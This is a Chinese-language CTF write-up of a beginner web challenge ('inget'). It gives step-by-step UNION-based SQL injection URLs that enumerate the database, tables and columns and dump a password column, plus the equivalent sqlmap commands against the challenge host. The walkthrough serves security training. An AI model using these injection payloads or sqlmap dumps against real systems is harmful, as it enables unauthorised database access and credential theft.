攻防世界-Web-inget新手

#题目 是一个小白写的不好请见谅
在这里插入图片描述
#场景
这里在这里插入图片描述
##1.1
这里的看到意思是“请输入ID,并尝试绕过”
这里很大概率就是 SQL注入 没有多余注入位置且是GET请求,就直接在url里输入尝试了,也可以用直接用sqlmap,两个我在这里都发一下。
在这里插入图片描述
##1.2
先尝试手动敲一下判断类型
因为是基础很简单就尝试出来了
在这里插入图片描述

http://ip/?id=1' union select 2,3 --+

在这里插入图片描述
##1.3

http://ip/?id=1' union select 2,database() --+

查出来当前数据库名为’cyber’
在这里插入图片描述
##1.4
查出来表名为’cyber’,这里巧合和数据库名一样

http://61.147.171.105:64923/?id=1' union select 2,group_concat(table_name) from information_schema.tables where table_schema = 'cyber' --+

在这里插入图片描述
##1.5
查出来字段三个在这里直接选’pw’因为flag就在里面

http://61.147.171.105:64923/?id=1' union select 2,group_concat(column_name) from information_schema.columns where table_name = 'cyber' --+

在这里插入图片描述
选择’pw’拿到flag

http://61.147.171.105:64923/?id=1' union select 2,group_concat(pw) from cyber.cyber --+

在这里插入图片描述

下面是用sqlmap
这个就比较简单了
爆库

python sqlmap.py -u "http://61.147.171.105:64923/index.php?id=1"  -dbs 

在这里插入图片描述
爆表

python sqlmap.py -u "http://61.147.171.105:64923/index.php?id=1"  -D cyber --tables

在这里插入图片描述
爆字段

python sqlmap.py -u "http://61.147.171.105:64923/index.php?id=1"  -D cyber -T cyber --columns

在这里插入图片描述
查看’pw’拿到flag

python sqlmap.py -u "http://61.147.171.105:64923/index.php?id=1"  -D cyber -T cyber -C  pw --dump

在这里插入图片描述

  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值